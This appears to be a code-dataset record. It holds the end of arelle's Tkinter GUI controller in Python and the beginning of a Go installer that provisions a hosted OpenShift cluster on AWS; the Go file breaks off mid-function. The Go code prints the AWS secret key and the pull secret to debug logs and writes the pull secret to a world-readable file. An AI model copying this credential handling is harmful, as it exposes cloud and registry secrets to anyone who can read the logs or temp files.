v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} {1}bit {2}\n"
"An open source XBRL platform\n"
"\u00a9 2010-2015 Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\[email protected]\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2013 Python Software Foundation"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"\n xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
"\n xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
"{3}"
)
.format(self.__version__, self.systemWordSize, Version.version,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", level=logging.INFO):
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
message = message % messageArgs
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if self.isMac:
return multFileNames
return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
global restartMain
while restartMain:
restartMain = False
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelle"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
[] |
[] |
[
"ARELLE_ARGS"
] |
[]
|
["ARELLE_ARGS"]
|
python
| 1 | 0 | |
contrib/pkg/aws/install.go
|
package aws
import (
crand "crypto/rand"
"encoding/base64"
"encoding/hex"
"encoding/json"
"fmt"
"hash/fnv"
"io"
"io/ioutil"
"math/big"
"math/rand"
"net"
"os"
"os/user"
"path/filepath"
"strings"
"time"
gocidr "github.com/apparentlymart/go-cidr/cidr"
log "github.com/sirupsen/logrus"
"golang.org/x/crypto/bcrypt"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apimachinery/pkg/runtime/serializer"
"k8s.io/apimachinery/pkg/util/intstr"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/client-go/dynamic"
kubeclient "k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/client-go/util/retry"
"github.com/openshift/hypershift-toolkit/pkg/api"
"github.com/openshift/hypershift-toolkit/pkg/ignition"
"github.com/openshift/hypershift-toolkit/pkg/pki"
"github.com/openshift/hypershift-toolkit/pkg/render"
)
const (
routerNodePortHTTP = 31080
routerNodePortHTTPS = 31443
externalOauthPort = 8443
workerMachineSetCount = 3
)
var (
excludeManifests = []string{
"kube-apiserver-service.yaml",
"openshift-apiserver-service.yaml",
"openvpn-server-service.yaml",
"v4-0-config-system-branding.yaml",
"oauth-server-service.yaml",
}
coreScheme = runtime.NewScheme()
coreCodecs = serializer.NewCodecFactory(coreScheme)
)
func init() {
if err := corev1.AddToScheme(coreScheme); err != nil {
panic(err)
}
}
func InstallCluster(name, releaseImage, dhParamsFile string, waitForReady bool) error {
// First, ensure that we can access the host cluster
cfg, err := loadConfig()
if err != nil {
return fmt.Errorf("cannot access existing cluster; make sure a connection to host cluster is available: %v", err)
}
dynamicClient, err := dynamic.NewForConfig(cfg)
if err != nil {
return fmt.Errorf("cannot obtain dynamic client: %v", err)
}
// Extract config information from management cluster
sshKey, err := getSSHPublicKey(dynamicClient)
if err != nil {
return fmt.Errorf("failed to fetch an SSH public key from existing cluster: %v", err)
}
log.Debugf("The SSH public key is: %s", string(sshKey))
client, err := kubeclient.NewForConfig(cfg)
if err != nil {
return fmt.Errorf("failed to obtain a kubernetes client from existing configuration: %v", err)
}
awsKey, awsSecretKey, err := getAWSCredentials(client)
if err != nil {
return fmt.Errorf("failed to obtain AWS credentials from host cluster: %v", err)
}
log.Debugf("AWS key: %s, secret: %s", awsKey, awsSecretKey)
if releaseImage == "" {
releaseImage, err = getReleaseImage(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain release image from host cluster: %v", err)
}
}
pullSecret, err := getPullSecret(client)
if err != nil {
return fmt.Errorf("failed to obtain a pull secret from cluster: %v", err)
}
log.Debugf("The pull secret is: %v", pullSecret)
infraName, region, err := getInfrastructureInfo(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain infrastructure info for cluster: %v", err)
}
log.Debugf("The management cluster infra name is: %s", infraName)
log.Debugf("The management cluster AWS region is: %s", region)
serviceCIDR, podCIDR, err := getNetworkInfo(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain network info for cluster: %v", err)
}
dnsZoneID, parentDomain, err := getDNSZoneInfo(dynamicClient)
if err != nil {
return fmt.Errorf("failed to obtain public zone information: %v", err)
}
log.Debugf("Using public DNS Zone: %s and parent suffix: %s", dnsZoneID, parentDomain)
machineNames, err := getMachineNames(dynamicClient)
if err != nil {
return fmt.Errorf("failed to fetch machine names for cluster: %v", err)
}
// Start creating resources on management cluster
_, err = client.CoreV1().Namespaces().Get(name, metav1.GetOptions{})
if err == nil {
return fmt.Errorf("target namespace %s already exists on management cluster", name)
}
if !errors.IsNotFound(err) {
return fmt.Errorf("unexpected error getting namespaces from management cluster: %v", err)
}
log.Infof("Creating namespace %s", name)
ns := &corev1.Namespace{}
ns.Name = name
_, err = client.CoreV1().Namespaces().Create(ns)
if err != nil {
return fmt.Errorf("failed to create namespace %s: %v", name, err)
}
// Ensure that we can run privileged pods
if err = ensurePrivilegedSCC(dynamicClient, name); err != nil {
return fmt.Errorf("failed to ensure privileged SCC for the new namespace: %v", err)
}
// Create pull secret
log.Infof("Creating pull secret")
if err := createPullSecret(client, name, pullSecret); err != nil {
return fmt.Errorf("failed to create pull secret: %v", err)
}
// Create Kube APIServer service
log.Infof("Creating Kube API service")
apiNodePort, err := createKubeAPIServerService(client, name)
if err != nil {
return fmt.Errorf("failed to create kube apiserver service: %v", err)
}
log.Infof("Created Kube API service with NodePort %d", apiNodePort)
log.Infof("Creating VPN service")
vpnNodePort, err := createVPNServerService(client, name)
if err != nil {
return fmt.Errorf("failed to create vpn server service: %v", err)
}
log.Infof("Created VPN service with NodePort %d", vpnNodePort)
log.Infof("Creating Openshift API service")
openshiftClusterIP, err := createOpenshiftService(client, name)
if err != nil {
return fmt.Errorf("failed to create openshift server service: %v", err)
}
log.Infof("Created Openshift API service with cluster IP: %s", openshiftClusterIP)
oauthNodePort, err := createOauthService(client, name)
if err != nil {
return fmt.Errorf("failed to create Oauth server service: %v", err)
}
log.Infof("Created Oauth server service with NodePort: %d", oauthNodePort)
// Fetch AWS cloud data
aws, err := NewAWSHelper(awsKey, awsSecretKey, region, infraName)
if err != nil {
return fmt.Errorf("cannot create an AWS client: %v", err)
}
lbInfo, err := aws.LoadBalancerInfo(machineNames)
if err != nil {
return fmt.Errorf("cannot get load balancer info: %v", err)
}
log.Infof("Using VPC: %s, Zone: %s, Subnet: %s", lbInfo.VPC, lbInfo.Zone, lbInfo.Subnet)
machineID, machineIP, err := getMachineInfo(dynamicClient, machineNames, fmt.Sprintf("%s-worker-%s", infraName, lbInfo.Zone))
if err != nil {
return fmt.Errorf("cannot get machine info: %v", err)
}
log.Infof("Using management machine with ID: %s and IP: %s", machineID, machineIP)
apiLBName := generateLBResourceName(infraName, name, "api")
apiAllocID, apiPublicIP, err := aws.EnsureEIP(apiLBName)
if err != nil {
return fmt.Errorf("cannot allocate API load balancer EIP: %v", err)
}
log.Infof("Allocated EIP with ID: %s, and IP: %s", apiAllocID, apiPublicIP)
apiLBARN, apiLBDNS, err := aws.EnsureNLB(apiLBName, lbInfo.Subnet, apiAllocID)
if err != nil {
return fmt.Errorf("cannot create network load balancer: %v", err)
}
log.Infof("Created API load balancer with ARN: %s, DNS: %s", apiLBARN, apiLBDNS)
apiTGARN, err := aws.EnsureTargetGroup(lbInfo.VPC, apiLBName, apiNodePort)
if err != nil {
return fmt.Errorf("cannot create API target group: %v", err)
}
log.Infof("Created API target group ARN: %s", apiTGARN)
oauthTGName := generateLBResourceName(infraName, name, "oauth")
oauthTGARN, err := aws.EnsureTargetGroup(lbInfo.VPC, oauthTGName, oauthNodePort)
if err != nil {
return fmt.Errorf("cannot create OAuth target group: %v", err)
}
if err = aws.EnsureTarget(apiTGARN, machineIP); err != nil {
return fmt.Errorf("cannot create API load balancer target: %v", err)
}
log.Infof("Created API load balancer target to %s", machineIP)
if err = aws.EnsureTarget(oauthTGARN, machineIP); err != nil {
return fmt.Errorf("cannot create OAuth load balancer target: %v", err)
}
log.Infof("Created OAuth load balancer target to %s", machineIP)
err = aws.EnsureListener(apiLBARN, apiTGARN, 6443, false)
if err != nil {
return fmt.Errorf("cannot create API listener: %v", err)
}
log.Infof("Created API load balancer listener")
err = aws.EnsureListener(apiLBARN, oauthTGARN, externalOauthPort, false)
if err != nil {
return fmt.Errorf("cannot create OAuth listener: %v", err)
}
log.Infof("Created OAuth load balancer listener")
apiDNSName := fmt.Sprintf("api.%s.%s", name, parentDomain)
err = aws.EnsureCNameRecord(dnsZoneID, apiDNSName, apiLBDNS)
if err != nil {
return fmt.Errorf("cannot create API DNS record: %v", err)
}
log.Infof("Created DNS record for API name: %s", apiDNSName)
routerLBName := generateLBResourceName(infraName, name, "apps")
routerLBARN, routerLBDNS, err := aws.EnsureNLB(routerLBName, lbInfo.Subnet, "")
if err != nil {
return fmt.Errorf("cannot create router load balancer: %v", err)
}
log.Infof("Created router load balancer with ARN: %s, DNS: %s", routerLBARN, routerLBDNS)
routerHTTPTGName := generateLBResourceName(infraName, name, "http")
routerHTTPARN, err := aws.EnsureTargetGroup(lbInfo.VPC, routerHTTPTGName, routerNodePortHTTP)
if err != nil {
return fmt.Errorf("cannot create router HTTP target group: %v", err)
}
log.Infof("Created router HTTP target group ARN: %s", routerHTTPARN)
err = aws.EnsureListener(routerLBARN, routerHTTPARN, 80, false)
if err != nil {
return fmt.Errorf("cannot create router HTTP listener: %v", err)
}
log.Infof("Created router HTTP load balancer listener")
routerHTTPSTGName := generateLBResourceName(infraName, name, "https")
routerHTTPSARN, err := aws.EnsureTargetGroup(lbInfo.VPC, routerHTTPSTGName, routerNodePortHTTPS)
if err != nil {
return fmt.Errorf("cannot create router HTTPS target group: %v", err)
}
log.Infof("Created router HTTPS target group ARN: %s", routerHTTPSARN)
err = aws.EnsureListener(routerLBARN, routerHTTPSARN, 443, false)
if err != nil {
return fmt.Errorf("cannot create router HTTPS listener: %v", err)
}
log.Infof("Created router HTTPS load balancer listener")
routerDNSName := fmt.Sprintf("*.apps.%s.%s", name, parentDomain)
err = aws.EnsureCNameRecord(dnsZoneID, routerDNSName, routerLBDNS)
if err != nil {
return fmt.Errorf("cannot create router DNS record: %v", err)
}
log.Infof("Created DNS record for router name: %s", routerDNSName)
vpnLBName := generateLBResourceName(infraName, name, "vpn")
vpnLBARN, vpnLBDNS, err := aws.EnsureNLB(vpnLBName, lbInfo.Subnet, "")
if err != nil {
return fmt.Errorf("cannot create vpn load balancer: %v", err)
}
log.Infof("Created VPN load balancer with ARN: %s and DNS: %s", vpnLBARN, vpnLBDNS)
vpnTGARN, err := aws.EnsureUDPTargetGroup(lbInfo.VPC, vpnLBName, vpnNodePort, apiNodePort)
if err != nil {
return fmt.Errorf("cannot create VPN target group: %v", err)
}
log.Infof("Created VPN target group ARN: %s", vpnTGARN)
if err = aws.EnsureTarget(vpnTGARN, machineID); err != nil {
return fmt.Errorf("cannot create VPN load balancer target: %v", err)
}
log.Infof("Created VPN load balancer target to %s", machineID)
err = aws.EnsureListener(vpnLBARN, vpnTGARN, 1194, true)
if err != nil {
return fmt.Errorf("cannot create VPN listener: %v", err)
}
log.Infof("Created VPN load balancer listener")
vpnDNSName := fmt.Sprintf("vpn.%s.%s", name, parentDomain)
err = aws.EnsureCNameRecord(dnsZoneID, vpnDNSName, vpnLBDNS)
if err != nil {
return fmt.Errorf("cannot create router DNS record: %v", err)
}
log.Infof("Created DNS record for VPN: %s", vpnDNSName)
err = aws.EnsureWorkersAllowNodePortAccess()
if err != nil {
return fmt.Errorf("cannot setup security group for worker nodes: %v", err)
}
log.Infof("Ensured that node ports on workers are accessible")
_, serviceCIDRNet, err := net.ParseCIDR(serviceCIDR)
if err != nil {
return fmt.Errorf("cannot parse service CIDR %s: %v", serviceCIDR, err)
}
_, podCIDRNet, err := net.ParseCIDR(podCIDR)
if err != nil {
return fmt.Errorf("cannot parse pod CIDR %s: %v", podCIDR, err)
}
serviceCIDRPrefixLen, _ := serviceCIDRNet.Mask.Size()
clusterServiceCIDR, exceedsMax := gocidr.NextSubnet(serviceCIDRNet, serviceCIDRPrefixLen)
if exceedsMax {
return fmt.Errorf("cluster service CIDR exceeds max address space")
}
podCIDRPrefixLen, _ := podCIDRNet.Mask.Size()
clusterPodCIDR, exceedsMax := gocidr.NextSubnet(podCIDRNet, podCIDRPrefixLen)
if exceedsMax {
return fmt.Errorf("cluster pod CIDR exceeds max address space")
}
params := api.NewClusterParams()
params.Namespace = name
params.ExternalAPIDNSName = apiDNSName
params.ExternalAPIPort = 6443
params.ExternalAPIIPAddress = apiPublicIP
params.ExternalOpenVPNDNSName = vpnDNSName
params.ExternalOpenVPNPort = 1194
params.ExternalOauthPort = externalOauthPort
params.APINodePort = uint(apiNodePort)
params.ServiceCIDR = clusterServiceCIDR.String()
params.PodCIDR = clusterPodCIDR.String()
params.ReleaseImage = releaseImage
params.IngressSubdomain = fmt.Sprintf("apps.%s.%s", name, parentDomain)
params.OpenShiftAPIClusterIP = openshiftClusterIP
params.OpenVPNNodePort = fmt.Sprintf("%d", vpnNodePort)
params.BaseDomain = fmt.Sprintf("%s.%s", name, parentDomain)
params.CloudProvider = "AWS"
params.InternalAPIPort = 6443
params.EtcdClientName = "etcd-client"
params.NetworkType = "OpenShiftSDN"
params.ImageRegistryHTTPSecret = generateImageRegistrySecret()
params.RouterNodePortHTTP = fmt.Sprintf("%d", routerNodePortHTTP)
params.RouterNodePortHTTPS = fmt.Sprintf("%d", routerNodePortHTTPS)
params.RouterServiceType = "NodePort"
params.Replicas = "1"
workingDir, err := ioutil.TempDir("", "")
if err != nil {
return err
}
log.Infof("The working directory is %s", workingDir)
pkiDir := filepath.Join(workingDir, "pki")
if err = os.Mkdir(pkiDir, 0755); err != nil {
return fmt.Errorf("cannot create temporary PKI directory: %v", err)
}
log.Info("Generating PKI")
if len(dhParamsFile) > 0 {
if err = copyFile(dhParamsFile, filepath.Join(pkiDir, "openvpn-dh.pem")); err != nil {
return fmt.Errorf("cannot copy dh parameters file %s: %v", dhParamsFile, err)
}
}
if err := pki.GeneratePKI(params, pkiDir); err != nil {
return fmt.Errorf("failed to generate PKI assets: %v", err)
}
manifestsDir := filepath.Join(workingDir, "manifests")
if err = os.Mkdir(manifestsDir, 0755); err != nil {
return fmt.Errorf("cannot create temporary manifests directory: %v", err)
}
pullSecretFile := filepath.Join(workingDir, "pull-secret")
if err = ioutil.WriteFile(pullSecretFile, []byte(pullSecret), 0644); err != nil {
return fmt.Errorf("failed to create temporary pull secret file: %v", err)
}
log.Info("Generating ignition for workers")
if err = ignition.GenerateIgnition(params, sshKey, pullSecretFile, pkiDir, workingDir); err != nil {
return fmt.Errorf("cannot generate ignition file for workers: %v", err)
}
// Ensure that S3 bucket with ignition file in it exists
bucketName := generateBucketName(infraName, name, "ign")
log.Infof("Ensuring ignition bucket exists")
if err = aws.EnsureIgnitionBucket(bucketName, filepath.Join(workingDir, "bootstrap.ign")); err != nil {
return fmt.Errorf("failed to ensure ignition bucket exists: %v", err)
}
log.Info("Rendering Manifests")
render.RenderPKISecrets(pkiDir, manifestsDir, true, true, true)
caBytes, err := ioutil.ReadFile(filepath.Join(pkiDir, "combined-ca.crt"))
if err != nil {
return fmt.Errorf("failed to render PKI secrets: %v", err)
}
params.OpenshiftAPIServerCABundle = base64.StdEncoding.EncodeToString(caBytes)
if err = render.RenderClusterManifests(params, pullSecretFile, manifestsDir, true, true, true, true, true); err != nil {
return fmt.Errorf("failed to render manifests for cluster: %v", err)
}
// Create a machineset for the new cluster's worker nodes
if err = generateWorkerMachineset(dynamicClient, infraName, lbInfo.Zone, name, routerLBName, filepath.Join(manifestsDir, "machineset.json")); err != nil {
return fmt.Errorf("failed to generate worker machineset: %v", err)
}
if err = generateUserDataSecret(name, bucketName, filepath.Join(manifestsDir, "machine-user-data.json")); err != nil {
return fmt.Errorf("failed to generate user data secret: %v", err)
}
kubeadminPassword, err := generateKubeadminPassword()
if err != nil {
return fmt.Errorf("failed to generate kubeadmin password: %v", err)
}
if err = generateKubeadminPasswordTargetSecret(kubeadminPassword, filepath.Join(manifestsDir, "kubeadmin-secret.json")); err != nil {
return fmt.Errorf("failed to create kubeadmin secret manifest for target cluster: %v", err)
}
if err = generateKubeadminPasswordSecret(kubeadminPassword, filepath.Join(manifestsDir, "kubeadmin-host-secret.json")); err != nil {
return fmt.Errorf("failed to create kubeadmin secret manifest for management cluster: %v", err)
}
if err = generateKubeconfigSecret(filepath.Join(pkiDir, "admin.kubeconfig"), filepath.Join(manifestsDir, "kubeconfig-secret.json")); err != nil {
return fmt.Errorf("failed to create kubeconfig secret manifest for management cluster: %v", err)
}
if err = generateTargetPullSecret([]byte(pullSecret), filepath.Join(manifestsDir, "user-pull-secret.json")); err != nil {
return fmt.Errorf("failed to create pull secret manifest for target cluster: %v", err)
}
// Create the system branding manifest (cannot be applied because it's too large)
if err = createBrandingSecret(client, name, filepath.Join(manifestsDir, "v4-0-config-system-branding.yaml")); err != nil {
return fmt.Errorf("failed to create oauth branding secret: %v", err)
}
excludedDir, err := ioutil.TempDir("", "")
if err != nil {
return fmt.Errorf("failed to create a temporary directory for excluded manifests")
}
initialExclude := append(excludeManifests, "etcd-cluster.yaml")
if err = applyManifests(cfg, name, manifestsDir, initialExclude, excludedDir); err != nil {
return fmt.Errorf("failed to apply manifests: %v", err)
}
time.Sleep(30 * time.Second)
if err = applyManifests(cfg, name, excludedDir, excludeManifests, manifestsDir); err != nil {
return fmt.Errorf("failed to apply etcd cluster manifest")
}
log.Infof("Cluster resources applied")
if waitForReady {
log.Infof("Waiting up to 10 minutes for API endpoint to be available.")
if err = waitForAPIEndpoint(pkiDir, apiDNSName); err != nil {
return fmt.Errorf("failed to access API endpoint: %v", err)
}
log.Infof("API is available at %s", fmt.Sprintf("https://%s:6443", apiDNSName))
log.Infof("Waiting up to 5 minutes for bootstrap pod to complete.")
if err = waitForBootstrapPod(client, name); err != nil {
return fmt.Errorf("failed to wait for bootstrap pod to complete: %v", err)
}
log.Infof("Bootstrap pod has completed.")
// Force the oauth server to restart so it can pick up the kubeadmin password
if err = updateOAuthDeployment(client, name); err != nil {
return fmt.Errorf("failed to update OAuth server deployment: %v", err)
}
log.Infof("OAuth server deployment updated.")
targetClusterCfg, err := getTargetClusterConfig(pkiDir)
if err != nil {
return fmt.Errorf("cannot create target cluster client config: %v", err)
}
targetClient, err := kubeclient.NewForConfig(targetClusterCfg)
if err != nil {
return fmt.Errorf("cannot create target cluster client: %v", err)
}
log.Infof("Waiting up to 10 minutes for nodes to be ready.")
if err = waitForNodesReady(targetClient, workerMachineSetCount); err != nil {
return fmt.Errorf("failed to wait for nodes ready: %v", err)
}
log.Infof("Nodes (%d) are ready", workerMachineSetCount)
log.Infof("Waiting up to 15 minutes for cluster operators to be ready.")
if err = waitForClusterOperators(targetClusterCfg); err != nil {
return fmt.Errorf("failed to wait for cluster operators: %v", err)
}
}
log.Infof("Cluster API URL: %s", fmt.Sprintf("https://%s:6443", apiDNSName))
log.Infof("Kubeconfig is available in secret %q in the %s namespace", "admin-kubeconfig", name)
log.Infof("Console URL: %s", fmt.Sprintf("https://console-openshift-console.%s", params.IngressSubdomain))
log.Infof("kubeadmin password is available in secret %q in the %s namespace", "kubeadmin-password", name)
return nil
}
func applyManifests(cfg *rest.Config, namespace, directory string, exclude []string, excludedDir string) error {
for _, f := range exclude {
name := filepath.Join(directory, f)
targetName := filepath.Join(excludedDir, f)
if err := os.Rename(name, targetName); err != nil {
return fmt.Errorf("cannot move %s: %v", name, err)
}
}
backoff := wait.Backoff{
Steps: 3,
Duration: 10 * time.Second,
Factor: 1.0,
Jitter: 0.1,
}
attempt := 0
err := retry.OnError(backoff, func(err error) bool { return true }, func() error {
attempt++
log.Infof("Applying Manifests. Attempt %d/3", attempt)
applier := NewApplier(cfg, namespace)
return applier.ApplyFile(directory)
})
if err != nil {
return fmt.Errorf("Failed to apply manifests: %v", err)
}
return nil
}
func createBrandingSecret(client kubeclient.Interface, namespace, fileName string) error {
objBytes, err := ioutil.ReadFile(fileName)
if err != nil {
return err
}
requiredObj, err := runtime.Decode(coreCodecs.UniversalDecoder(corev1.SchemeGroupVersion), objBytes)
if err != nil {
return err
}
secret, ok := requiredObj.(*corev1.Secret)
if !ok {
return fmt.Errorf("object in %s is not a secret", fileName)
}
_, err = client.CoreV1().Secrets(namespace).Create(secret)
return err
}
func createKubeAPIServerService(client kubeclient.Interface, namespace string) (int, error) {
svc := &corev1.Service{}
svc.Name = "kube-apiserver"
svc.Spec.Selector = map[string]string{"app": "kube-apiserver"}
svc.Spec.Type = corev1.ServiceTypeNodePort
svc.Spec.Ports = []corev1.ServicePort{
{
Port: 6443,
Protocol: corev1.ProtocolTCP,
TargetPort: intstr.FromInt(6443),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return 0, err
}
return int(svc.Spec.Ports[0].NodePort), nil
}
func createVPNServerService(client kubeclient.Interface, namespace string) (int, error) {
svc := &corev1.Service{}
svc.Name = "openvpn-server"
svc.Spec.Selector = map[string]string{"app": "openvpn-server"}
svc.Spec.Type = corev1.ServiceTypeNodePort
svc.Spec.Ports = []corev1.ServicePort{
{
Port: 1194,
Protocol: corev1.ProtocolUDP,
TargetPort: intstr.FromInt(1194),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return 0, err
}
return int(svc.Spec.Ports[0].NodePort), nil
}
func createOpenshiftService(client kubeclient.Interface, namespace string) (string, error) {
svc := &corev1.Service{}
